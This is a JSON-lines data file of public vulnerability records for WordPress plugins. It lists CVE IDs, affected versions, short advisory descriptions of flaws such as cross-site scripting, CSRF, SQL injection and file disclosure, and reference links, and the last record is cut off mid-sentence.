{"CVE_ID":"CVE-2023-4514","slug":"mmm-file-list","versionImpact":"2.3","description":"The Mmm Simple File List WordPress plugin through 2.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365b15e6-3755-4ed5-badd-c9dd962bd9fa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365b15e6-3755-4ed5-badd-c9dd962bd9fa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3916","slug":"swift-framework","versionImpact":"2.7.31","description":"The Swift Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 2.7.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Unfortunately, we did not receive a response from the vendor to send over the vulnerability details.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57103f8e-0874-4e56-8571-254607ada21c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57103f8e-0874-4e56-8571-254607ada21c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"name\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6546","slug":"one-click-close-comments","versionImpact":"2.7.1","description":"The One Click Close Comments plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.7.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb63b10-fe23-4f89-9ef3-0a61b4190320?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb63b10-fe23-4f89-9ef3-0a61b4190320?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-close-comments\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-close-comments\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7791","slug":"xpro-elementor-addons","versionImpact":"1.4.4.3","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018arrow\u2019 parameter within the Post Grid widget in all versions up to, and including, 1.4.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6025dd5-a1d7-48cc-90b3-f020d3d2298b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6025dd5-a1d7-48cc-90b3-f020d3d2298b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/post-grid\\\/post-grid.php#L1891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/post-grid\\\/post-grid.php#L1891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/xpro-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/xpro-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3141892\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8914","slug":"bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang","versionImpact":"2.0.1","description":"The Thanh To\u00e1n Qu\u00e9t M\u00e3 QR Code T\u1ef1 \u0110\u1ed9ng \u2013 MoMo, ViettelPay, VNPay v\u00e0 40 ng\u00e2n h\u00e0ng Vi\u1ec7t Nam plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0.1 due to incorrect use of the wp_kses_allowed_html function, which allows the 'onclick' attribute for certain HTML elements without sufficient restriction or context validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef7c48b-e8f2-40bd-aa48-191059e15453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef7c48b-e8f2-40bd-aa48-191059e15453?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/trunk\\\/inc\\\/functions.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bck-tu-dong-xac-nhan-thanh-toan-chuyen-khoan-ngan-hang\\\/trunk\\\/inc\\\/functions.php#L184\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9434","slug":"wpglobus-translate-options","versionImpact":"2.2.0","description":"The WPGlobus Translate Options plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on the on__translate_options_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts and update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddca65fa-0744-4b2a-808c-a913586edc60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddca65fa-0744-4b2a-808c-a913586edc60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpglobus-translate-options\\\/trunk\\\/includes\\\/class-wpglobus-translate-options.php#L442\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpglobus-translate-options\\\/trunk\\\/includes\\\/class-wpglobus-translate-options.php#L442\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11439","slug":"scancircle","versionImpact":"2.9.2","description":"The ScanCircle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'scancircle' shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scancircle\\\/trunk\\\/scancircle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scancircle\\\/trunk\\\/scancircle.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202428%40scancircle&new=3202428%40scancircle&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202428%40scancircle&new=3202428%40scancircle&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scancircle\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scancircle\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27cc6931-086c-43a5-965b-2a19f15bb356?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27cc6931-086c-43a5-965b-2a19f15bb356?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8855","slug":"wp-auctions","versionImpact":"3.7","description":"The WordPress Auction Plugin WordPress plugin through 3.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing editors and above to perform SQL injection attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04084f2a-45b8-4249-a472-f156fad0c90a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04084f2a-45b8-4249-a472-f156fad0c90a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0953","slug":"smtp-sendinblue","versionImpact":"1.1.1","description":"The SMTP for Sendinblue \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-sendinblue\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234379\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234379\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendinblue\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-sendinblue\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7ba65ac-e568-4c13-961d-6453f281d9fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7ba65ac-e568-4c13-961d-6453f281d9fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13864","slug":"timer-countdown","versionImpact":"1.0","description":"The Countdown Timer WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95b32b6-218a-4d02-b294-ab13458006b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95b32b6-218a-4d02-b294-ab13458006b2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12301","slug":"jsp-store-locator","versionImpact":"1.0","description":"The JSP Store Locator WordPress plugin through 1.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d93db07-415f-475b-a76d-2e12f849a4dc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d93db07-415f-475b-a76d-2e12f849a4dc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7684","slug":"lastfm-recent-album-artwork","versionImpact":"1.0.2","description":"The Last.fm Recent Album Artwork plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on the 'lastfm_albums_artwork.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastfm-recent-album-artwork\\\/trunk\\\/lastfm_albums_artwork.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastfm-recent-album-artwork\\\/trunk\\\/lastfm_albums_artwork.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastfm-recent-album-artwork\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastfm-recent-album-artwork\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf6671d-f481-4fe5-b966-2591ab76b0b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf6671d-f481-4fe5-b966-2591ab76b0b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0331","slug":"correos-oficial","versionImpact":"1.2.0.2","description":"The Correos Oficial WordPress plugin through 1.2.0.2 does not have an authorization check or user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b4dbaf3-1364-4103-9a7b-b5a1355c685b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b4dbaf3-1364-4103-9a7b-b5a1355c685b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4348","slug":"ct-ultimate-gdpr","versionImpact":"2.4","description":"The Ultimate GDPR & CCPA plugin for WordPress is vulnerable to unauthenticated settings import and export via the export_settings & import_settings functions in versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to change plugin settings and conduct attacks such as redirecting visitors to malicious sites.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e2e8fb-ea36-4602-bead-8daf75d6dfb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40e2e8fb-ea36-4602-bead-8daf75d6dfb9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-ultimate-gdpr-ccpa-compliance-toolkit-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-ultimate-gdpr-ccpa-compliance-toolkit-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4391","slug":"woo-gift-cards-lite","versionImpact":"2.1.1","description":"The Ultimate Gift Cards for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the mwb_wgm_save_post() function. This makes it possible for unauthenticated attackers to modify product gift card details via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da322ea-0206-4838-8ac4-9dd201bb00bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2da322ea-0206-4838-8ac4-9dd201bb00bc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/2.1.2\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php?rev=2549904#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-gift-cards-lite\\\/tags\\\/2.1.2\\\/admin\\\/class-woocommerce-gift-cards-lite-admin.php?rev=2549904#L461\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4471","slug":"order-tracking","versionImpact":"3.3.6","description":"The Order Tracking Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the start_date and end_date parameters in versions up to, and including, 3.3.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed64d0ff-4f49-4c18-86ec-2c6fbd559d2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed64d0ff-4f49-4c18-86ec-2c6fbd559d2e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tracking\\\/trunk\\\/includes\\\/Export.class.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-tracking\\\/trunk\\\/includes\\\/Export.class.php#L158\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4297","slug":"mmm-file-list","versionImpact":"2.3","description":"The Mmm Simple File List WordPress plugin through 2.3 does not validate the generated path to list files from, allowing any authenticated users, such as subscribers, to list the content of arbitrary directories.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ff85b06-819c-459e-90a9-6151bfd70978\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ff85b06-819c-459e-90a9-6151bfd70978\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3915","slug":"swift-framework","versionImpact":"2.7.31","description":"The Swift Framework plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sf_edit_directory_item() function in all versions up to, and including, 2.7.31. This makes it possible for unauthenticated attackers to update arbitrary posts with arbitrary content. Unfortunately, we did not receive a response from the vendor to send over the vulnerability details.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"name\":\"https:\\\/\\\/swiftideas.com\\\/swift-framework\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855055d5-362e-4a92-9e9d-97eab328dcc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855055d5-362e-4a92-9e9d-97eab328dcc3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4866","slug":"ultraaddons-elementor-lite","versionImpact":"1.1.6","description":"The UltraAddons \u2013 Elementor Addons (Header Footer Builder, Custom Font, Custom CSS,Woo Widget, Menu Builder, Anywhere Elementor Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544d7572-651f-45bb-b2ce-d768553c251a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544d7572-651f-45bb-b2ce-d768553c251a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hotspot.php#L341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hotspot.php#L341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hero-slider.php#L919\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/hero-slider.php#L919\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/work-hour.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/work-hour.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/advance-pricing-table.php#L1340\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/advance-pricing-table.php#L1340\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/video-popup.php#L592\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultraaddons-elementor-lite\\\/trunk\\\/inc\\\/widget\\\/video-popup.php#L592\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6545","slug":"admin-trim-interface","versionImpact":"3.5.1","description":"The Admin Trim Interface plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.5.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a50f24-7011-4fe4-a095-e7e320bfec81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92a50f24-7011-4fe4-a095-e7e320bfec81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-trim-interface\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-trim-interface\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8046","slug":"logo-showcase-ultimate","versionImpact":"1.4.1","description":"The Logo Showcase Ultimate \u2013 Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG 